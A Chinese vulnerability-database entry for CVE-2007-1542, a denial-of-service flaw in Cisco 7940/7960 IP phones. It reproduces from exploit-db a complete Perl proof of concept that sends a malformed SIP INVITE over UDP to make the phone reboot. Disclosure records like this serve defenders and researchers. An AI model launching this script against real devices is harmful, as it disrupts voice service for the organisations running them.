Cisco 7940/7960 Phone SIP INVITE消息远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112499 漏洞类型 其他
发布时间 2007-03-20 更新时间 2007-03-22
CVE编号 CVE-2007-1542 CNNVD-ID CNNVD-200703-490
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/3526
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-490
|漏洞详情
CiscoIPPhone是一套通过IP网络提供语音通信的系统。CiscoIPPhone在处理某些畸形SIPINVITE消息时存在拒绝服务漏洞,远程攻击者可能利用此漏洞导致设备重载无法正常工作。如果远程攻击者向设备发送了在Remote-Party-ID中包含有畸形sipURI字段的特制INVITE消息的话,就可以导致设备重载。
|漏洞EXP
#!/usr/bin/perl
# Title: Cisco 7940 SIP INVITE remote DOS 
# Date: February 19, 2007 
# ID: KIPH2 
#
# Synopsis: After sending a cra fted INVITE message the device immediately 
# reboots. The phone does not check properly the sipURI field of the 
# Remote-Party-ID in the message. 
#
# The vendor was informed and acknowledged the vulnerability. This 
# vulnerability was identified by the Madynes research team at INRIA 
# Lorraine, using the Madynes VoIP fuzzer. 
#
# Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol 
# for VoIP signalization. SIP is an ASCII based INVITE message is used to 
# initiate and maintain a communication session. 
#
# Affected devices: Cisco phone 7940/7960 running firmware P0S3-07-4-00 
#
# Unaffected: devices running firmware POS8-6-0 
#
# Description: After receiving one crafted SIP INVITE message, the 
# affected device reboots immediately. The proof of concept code can be 
# used to demonstrate the vulnerability. 
#
# Resolution: 
#
# Fixed software is available from the vendor and customers following 
# recommended best practices (ie segregating VOIP traffic from data) will 
# be protected from malicious traffic in most situations. 
#
# Credits: 
#
# Humberto J. Abdelnur (Ph.D Student) 
#
# Radu State (Ph.D) 
#
# Olivier Festor (Ph.D) 
#
# This vulnerability was identified by the Madynes research team at INRIA 
#
# Lorraine, using the Madynes VoIP fuzzer. 
#
# http://madynes.loria.fr/ 

use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],

Proto=>'udp',

PeerAddr=>$ARGV[0]);


$msg="INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP
192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla
\@192.168.1.2;tag=qwzng\r\nTo: <sip:$ARGV[2]\@$ARGV[0];user=ip>\r
\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r
\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n";

$socket->send($msg);

# milw0rm.com [2007-03-20]
|参考资料

来源:BID
名称:23047
链接:http://www.securityfocus.com/bid/23047
来源:VUPEN
名称:ADV-2007-1023
链接:http://www.frsirt.com/english/advisories/2007/1023
来源:SECUNIA
名称:24600
链接:http://secunia.com/advisories/24600
来源:XF
名称:cisco-ipphone-sip-invite-dos(33098)
链接:http://xforce.iss.net/xforce/xfdb/33098
来源:SECTRACK
名称:1017797
链接:http://www.securitytracker.com/id?1017797
来源:CISCO
名称:20070320CiscoIPPhone7940/7960SIPINVITEDenialofService
链接:http://www.cisco.com/en/US/products/products_security_response09186a00808075ad.html